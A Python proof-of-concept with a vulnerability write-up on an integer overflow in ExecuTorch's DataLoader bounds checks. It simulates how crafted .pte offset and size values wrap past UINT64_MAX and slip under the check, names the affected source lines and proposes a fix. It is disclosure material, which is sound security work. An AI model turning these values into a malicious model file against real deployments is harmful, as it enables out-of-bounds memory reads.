#!/usr/bin/env python3
"""
ExecuTorch DataLoader offset+size Integer Overflow (CWE-190 -> CWE-125)
=======================================================================
Target: ExecuTorch (pytorch/executorch)
Commit: 90e6e4ca4ef369ce4288ffcd2a0210d5137117dd
Affected Files:
- runtime/executor/mmap_data_loader.cpp:163
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/mmap_data_loader.cpp#L163
- runtime/executor/file_data_loader.cpp:150
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/file_data_loader.cpp#L150
- runtime/executor/file_descriptor_data_loader.cpp:161
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/file_descriptor_data_loader.cpp#L161
Safe Reference (uses overflow check):
- extension/data_loader/buffer_data_loader.h:38-41
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/extension/data_loader/buffer_data_loader.h#L38-L41
Additionally affected — segment offset calculations:
- runtime/executor/program.cpp:96 (segment_base_offset + segment_data_size)
- runtime/executor/program.cpp:504 (segment_base_offset_ + segment->offset())
- runtime/executor/program.cpp:589 (segment_base_offset_ + segment->offset() + segment_info->segment_index())
CWE-190: Integer Overflow or Wraparound
CWE-125: Out-of-bounds Read
Description:
3 of 4 DataLoader implementations in ExecuTorch check `offset + size <= file_size_`
to validate that a Load request stays within bounds. However, when offset and size
are both attacker-controlled 64-bit values from a malicious .pte file, their sum
can overflow past UINT64_MAX and wrap around to a small value, bypassing the check.
BufferDataLoader is the ONLY implementation that correctly uses c10::add_overflows()
to detect the wraparound before performing the comparison.
A malicious .pte model file controls these values through the FlatBuffer schema:
- DataSegment.offset and DataSegment.size in the Program flatbuffer
- These flow directly into DataLoader::load(offset, size) calls
Impact:
An attacker crafting a malicious .pte file can cause out-of-bounds memory reads
(and potentially writes via mmap) by overflowing the offset+size bounds check.
This can lead to information disclosure or code execution.
"""
import struct
import sys
# Largest value a C++ uint64_t can hold (2**64 - 1). ANDing a Python int with
# it emulates the modulo-2^64 wraparound of unsigned 64-bit addition.
UINT64_MAX = (1 << 64) - 1
def simulate_unsafe_check(offset: int, size: int, file_size: int, *, bits: int = 64) -> dict:
    """Simulate the overflow-prone bounds check used in 3 of 4 DataLoaders.

    Models the C++ guard::

        if (offset + size > file_size_) {
            return Error::InvalidArgument;
        }

    The addition there is performed in a fixed-width unsigned integer, so the
    sum wraps modulo ``2**bits`` instead of growing, and a huge ``offset`` can
    produce a small sum that slips under ``file_size``.

    Args:
        offset: Requested load offset.
        size: Requested load length.
        file_size: Size of the backing file.
        bits: Width of the unsigned type being emulated. Defaults to 64
            (``uint64_t``); pass 32 to model a platform with 32-bit ``size_t``.

    Returns:
        A dict holding the three inputs plus:
        ``offset_plus_size_wrapped`` (sum after fixed-width truncation),
        ``offset_plus_size_true`` (exact sum),
        ``check_passes`` (True when the wrapped sum is within ``file_size``),
        ``is_actually_valid`` (True when the exact sum is within ``file_size``).

    Raises:
        ValueError: If ``bits`` is not positive.
    """
    if bits <= 0:
        raise ValueError("bits must be a positive integer")

    # All-ones mask of the emulated width; AND-ing truncates like the C++ type.
    mask = (1 << bits) - 1

    # Python ints never overflow, so this is the mathematically exact sum.
    true_sum = offset + size
    wrapped_sum = true_sum & mask

    return {
        "offset": offset,
        "size": size,
        "file_size": file_size,
        "offset_plus_size_wrapped": wrapped_sum,
        "offset_plus_size_true": true_sum,
        # What the vulnerable C++ code decides.
        "check_passes": wrapped_sum <= file_size,
        # What the decision should have been.
        "is_actually_valid": true_sum <= file_size,
    }
def simulate_safe_check(offset: int, size: int, file_size: int, *, bits: int = 64) -> dict:
    """Simulate the overflow-aware bounds check used in BufferDataLoader.

    Models the C++ guard::

        size_t total;
        if (c10::add_overflows(offset, size, &total) || total > file_size_) {
            return Error::InvalidArgument;
        }

    The request is rejected as soon as the exact sum does not fit in the
    fixed-width unsigned type, so a wrapped-around sum is never compared
    against ``file_size``.

    Args:
        offset: Requested load offset.
        size: Requested load length.
        file_size: Size of the backing file.
        bits: Width of the unsigned type being emulated. Defaults to 64
            (``uint64_t``); pass 32 to model a platform with 32-bit ``size_t``.

    Returns:
        A dict holding the three inputs plus:
        ``overflow_detected`` (True when the exact sum exceeds the type's max),
        ``check_passes`` (True only when no overflow occurred and the sum is
        within ``file_size``),
        ``is_actually_valid`` (True when the exact sum is within ``file_size``).

    Raises:
        ValueError: If ``bits`` is not positive.
    """
    if bits <= 0:
        raise ValueError("bits must be a positive integer")

    max_value = (1 << bits) - 1

    # Python ints never overflow, so this is the mathematically exact sum.
    true_sum = offset + size
    overflows = true_sum > max_value
    within_file = true_sum <= file_size

    return {
        "offset": offset,
        "size": size,
        "file_size": file_size,
        "overflow_detected": overflows,
        # An overflow short-circuits to rejection, as add_overflows() does.
        "check_passes": (not overflows) and within_file,
        "is_actually_valid": within_file,
    }
def print_result(label: str, result: dict, safe: bool = False):
    """Pretty-print one simulated bounds-check result to stdout.

    Args:
        label: Heading shown in square brackets above the report.
        result: Dict produced by one of the ``simulate_*_check`` functions.
        safe: When true, ``result`` is read as a safe-check dict and its
            ``overflow_detected`` flag is shown; otherwise the wrapped and
            exact sums of an unsafe-check dict are shown.
    """
    passed = result["check_passes"]
    in_bounds = result["is_actually_valid"]
    verdict = "PASS (allows load)" if passed else "FAIL (rejects load)"
    within = "YES" if in_bounds else "NO"

    print(f" [{label}]")

    # The three request fields share one layout: zero-padded hex, then decimal.
    for field in ("offset", "size", "file_size"):
        value = result[field]
        print(f" {field} = 0x{value:016X} ({value})")

    if safe:
        print(f" overflow_detected = {result['overflow_detected']}")
    else:
        wrapped = result["offset_plus_size_wrapped"]
        print(f" offset+size (uint64 wrapped) = 0x{wrapped:016X} ({wrapped})")
        print(f" offset+size (true) = 0x{result['offset_plus_size_true']:X}")

    print(f" Bounds check: {verdict}")
    print(f" Actually within file? {within}")

    # A check that passes for a request that is really out of bounds is the bug.
    if passed and not in_bounds:
        print(" >>> VULNERABILITY: check passes but access is OUT OF BOUNDS <<<")
    print()
def main():
    """Run the overflow demonstration and report how many scenarios bypass the check.

    Prints three overflowing scenarios and one legitimate one, a listing of
    the vulnerable and safe C++ checks, two segment-offset wraparound
    examples, and a summary.

    Returns:
        0 when none of the three overflow scenarios gets past the simulated
        unsafe check, otherwise 1.
    """
    rule_width = 78

    def emit(*lines):
        # One print call per line; an empty string yields a blank line.
        for text in lines:
            print(text)

    def heading(rule_char, *titles):
        # Title line(s) framed by two horizontal rules, then a blank line.
        rule = rule_char * rule_width
        emit(rule, *titles, rule, "")

    def wrap64(value):
        # Truncate an exact Python sum the way uint64_t arithmetic would.
        return value & UINT64_MAX

    def verdict_line(wrapped_value, limit):
        # Shows whether the wrapped sum slips under the file size.
        outcome = "YES => check passes!" if wrapped_value <= limit else "NO"
        return f" {wrapped_value} <= {limit}? {outcome}"

    def compare_loaders(req_offset, req_size, total_size):
        # Run both simulated checks, print them, and hand back the unsafe result.
        unsafe_result = simulate_unsafe_check(req_offset, req_size, total_size)
        safe_result = simulate_safe_check(req_offset, req_size, total_size)
        print_result("UNSAFE (mmap/file/fd DataLoader)", unsafe_result, safe=False)
        print_result("SAFE (BufferDataLoader)", safe_result, safe=True)
        return unsafe_result

    # Unsafe-check results of the overflow scenarios, tallied at the end.
    overflow_results = []

    heading(
        "=",
        "ExecuTorch DataLoader offset+size Integer Overflow PoC",
        "CWE-190 (Integer Overflow) -> CWE-125 (Out-of-bounds Read)",
    )

    # ---- Scenario 1: large offset plus small size wraps to a small value ----
    heading("-", "SCENARIO 1: Classic overflow (large offset + small size)")
    emit(
        " Attacker sets offset=0xFFFFFFFFFFFFFFF5, size=100 in malicious .pte file.",
        " Real file is only 1024 bytes.",
        "",
    )
    s1_file, s1_offset, s1_size = 1024, 0xFFFFFFFFFFFFFFF5, 100
    s1_sum = s1_offset + s1_size
    s1_wrapped = wrap64(s1_sum)
    emit(
        " Math:",
        f" 0xFFFFFFFFFFFFFFF5 + 100 = 0x{s1_sum:X}",
        f" Truncated to uint64: 0x{s1_wrapped:016X} = {s1_wrapped}",
        verdict_line(s1_wrapped, s1_file),
        "",
    )
    overflow_results.append(compare_loaders(s1_offset, s1_size, s1_file))

    # ---- Scenario 2: the smallest possible overflow ----
    heading("-", "SCENARIO 2: Minimal overflow — offset = UINT64_MAX, size = 1")
    s2_offset, s2_size, s2_file = UINT64_MAX, 1, 4096
    s2_sum = s2_offset + s2_size
    s2_wrapped = wrap64(s2_sum)
    emit(
        " Math:",
        f" 0x{s2_offset:016X} + 1 = 0x{s2_sum:X}",
        f" Truncated to uint64: 0x{s2_wrapped:016X} = {s2_wrapped}",
        verdict_line(s2_wrapped, s2_file),
        "",
    )
    overflow_results.append(compare_loaders(s2_offset, s2_size, s2_file))

    # ---- Scenario 3: both operands large ----
    heading("-", "SCENARIO 3: Both offset and size large — read 1GB at offset near UINT64_MAX")
    s3_size = 1024 ** 3  # 1 GB
    s3_offset = UINT64_MAX - s3_size + 2  # chosen so the sum wraps to exactly 1
    s3_file = 1024 ** 2  # 1 MB file
    s3_sum = s3_offset + s3_size
    s3_wrapped = wrap64(s3_sum)
    emit(
        f" offset = UINT64_MAX - 1GB + 2 = 0x{s3_offset:016X}",
        f" size = 1 GB = 0x{s3_size:016X}",
        f" file = 1 MB = 0x{s3_file:016X}",
        " Math:",
        f" offset + size = 0x{s3_sum:X}",
        f" Truncated: 0x{s3_wrapped:016X} = {s3_wrapped}",
        verdict_line(s3_wrapped, s3_file),
        "",
    )
    overflow_results.append(compare_loaders(s3_offset, s3_size, s3_file))

    # ---- Scenario 4: an in-bounds request, not counted in the tally ----
    heading("-", "SCENARIO 4: Legitimate access (sanity check — no overflow)")
    compare_loaders(256, 512, 1024)

    # ---- Side-by-side C++ snippets ----
    heading("=", "CODE COMPARISON")
    emit(
        "VULNERABLE (mmap_data_loader.cpp:163, file_data_loader.cpp:150,",
        " file_descriptor_data_loader.cpp:161):",
        "",
        " if (offset + size > file_size_) {",
        ' ET_LOG(Error, "offset %zu + size %zu > file_size_ %zu",',
        " offset, size, file_size_);",
        " return Error::InvalidArgument;",
        " }",
        "",
        "SAFE (buffer_data_loader.h:38-41):",
        "",
        " size_t total;",
        " if (c10::add_overflows(offset, size, &total) || total > data_size_) {",
        " return Error::InvalidArgument;",
        " }",
        "",
    )

    # ---- Related segment-offset arithmetic in program.cpp ----
    heading("=", "RELATED: Segment Offset Overflows in program.cpp")
    emit(
        "The same pattern appears in segment offset calculations:",
        "",
        " program.cpp:96:",
        " size_t segment_base_offset = program_data_size;",
        " // segment_base_offset + segment_data_size can overflow",
        "",
    )
    base_a, data_len = 0xFFFFFFFFFFFFFF00, 0x200
    sum_a = wrap64(base_a + data_len)
    emit(
        f" segment_base_offset = 0x{base_a:016X}",
        f" segment_data_size = 0x{data_len:016X}",
        f" Sum (uint64 wrapped) = 0x{sum_a:016X} = {sum_a}",
        " >>> Overflows to small value, subsequent offset checks use wrong base",
        "",
    )
    emit(
        " program.cpp:504:",
        " const void* segment_data = static_cast<const uint8_t*>(segment_data_.data)",
        " + segment_base_offset_ + segment->offset();",
        "",
    )
    base_b, seg_off = 0x8000000000000000, 0x8000000000000001
    sum_b = wrap64(base_b + seg_off)
    emit(
        f" segment_base_offset_ = 0x{base_b:016X}",
        f" segment->offset() = 0x{seg_off:016X}",
        f" Sum (uint64 wrapped) = 0x{sum_b:016X} = {sum_b}",
        " >>> Pointer arithmetic wraps, points to attacker-controlled offset",
        "",
    )

    # ---- Summary ----
    heading("=", "SUMMARY")
    emit(
        " 3 of 4 DataLoader implementations use `offset + size > file_size_`",
        " which is vulnerable to uint64_t overflow. The 4th (BufferDataLoader)",
        " correctly uses c10::add_overflows() to detect wraparound.",
        "",
        " Attack vector: Malicious .pte model file with crafted segment offsets",
        " and sizes that cause the bounds check to pass via integer overflow,",
        " leading to out-of-bounds memory access.",
        "",
        " Fix: Use c10::add_overflows() in all DataLoader implementations,",
        " matching the pattern already used in BufferDataLoader.",
        "",
    )

    # A bypass is an unsafe check that passed for an out-of-bounds request.
    bypasses = 0
    for outcome in overflow_results:
        if outcome["check_passes"] and not outcome["is_actually_valid"]:
            bypasses += 1
    print(f" Vulnerabilities demonstrated: {bypasses}/3 overflow scenarios bypass check")

    # Non-zero exit status signals that at least one bypass was demonstrated.
    if bypasses:
        return 1
    return 0
# Script entry point: main()'s return value (non-zero when at least one
# overflow scenario bypassed the simulated check) becomes the exit status.
if __name__ == "__main__":
    sys.exit(main())